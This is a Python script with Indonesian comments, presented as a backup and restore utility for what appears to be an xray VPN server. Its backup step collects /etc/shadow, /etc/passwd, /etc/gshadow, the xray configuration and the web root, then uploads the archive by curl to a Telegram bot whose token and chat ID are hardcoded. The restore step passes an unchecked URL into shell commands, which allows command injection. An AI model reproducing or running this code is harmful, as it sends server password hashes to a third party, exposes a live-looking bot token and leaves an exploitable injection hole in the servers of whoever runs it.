#!/bin/bash
import os
import shutil
import subprocess
from datetime import datetime

# Fungsi untuk mengirim file melalui bot Telegram
def send_file_via_telegram(file_path, token, chat_id):
    url = "https://api.telegram.org/bot{}/sendDocument".format(token)
    subprocess.run(["curl", "-F", "chat_id={}".format(chat_id), "-F", "document=@{}".format(file_path), url])

# Fungsi untuk melakukan backup
def backup(token, chat_id):
    # Buat direktori untuk menyimpan backup jika belum ada
    backup_dir = '/root/backup'
    if not os.path.exists(backup_dir):
        os.makedirs(backup_dir)

    # Melakukan backup file-file penting
    files_to_backup = [
        '/etc/passwd',
        '/etc/group',
        '/etc/shadow',
        '/etc/gshadow',
        '/etc/crontab',
        '/var/lib/kyt/',
        '/etc/xray',
        '/var/www/html/'
    ]
    for file_path in files_to_backup:
        if os.path.exists(file_path):
            if os.path.isdir(file_path):
                shutil.copytree(file_path, os.path.join(backup_dir, os.path.basename(file_path)))
            else:
                shutil.copy(file_path, backup_dir)

    # Kompresi direktori backup menjadi file zip
    backup_filename = os.path.join('/root', 'backup.zip')
    shutil.make_archive(backup_filename.split('.')[0], 'zip', '/root', 'backup')

    # Kirim file backup melalui bot Telegram
    send_file_via_telegram(backup_filename, token, chat_id)

    print("Backup selesai.")

# Fungsi untuk melakukan restore
def restore():
    # Meminta URL file backup dari pengguna
    backup_url = input("Masukkan URL file backup: ")

    # Download file backup dari URL
    os.system(f"wget -q {backup_url}")

    # Ekstrak file backup jika berupa file zip
    filename = os.path.basename(backup_url)
    if filename.endswith('.zip'):
        os.system(f"unzip -qq {filename}")

    # Memulai proses restore
    print("Memulai proses restore...")
    # Lakukan restore dari file yang telah diekstrak
    # Misalnya:
    # os.system("cp -r backup/* /tujuan/restore/")
    # os.system("cp -r kyt /var/lib/")
    # os.system("cp -r xray /etc/")
    # os.system("cp -r html /var/www/")

    # Hapus file dan direktori sementara setelah restore selesai
    os.system(f"rm -rf {filename.split('.')[0]}")
    print("Restore selesai.")

def main():
    # Token bot Telegram
    token = "6903848119:AAGn9zxgTdDvoo4oj1n4azvWJXzDAP8w1Rs"
    # ID obrolan tempat hasil backup akan dikirim
    chat_id = "324500970"

    # Tampilkan menu pilihan untuk backup atau restore
    print("Pilih menu:")
    print("1. Backup")
    print("2. Restore")

    choice = input("Masukkan pilihan (1/2): ")

    if choice == '1':
        backup(token, chat_id)
    elif choice == '2':
        restore()
    else:
        print("Pilihan tidak valid.")

if __name__ == "__main__":
    main()
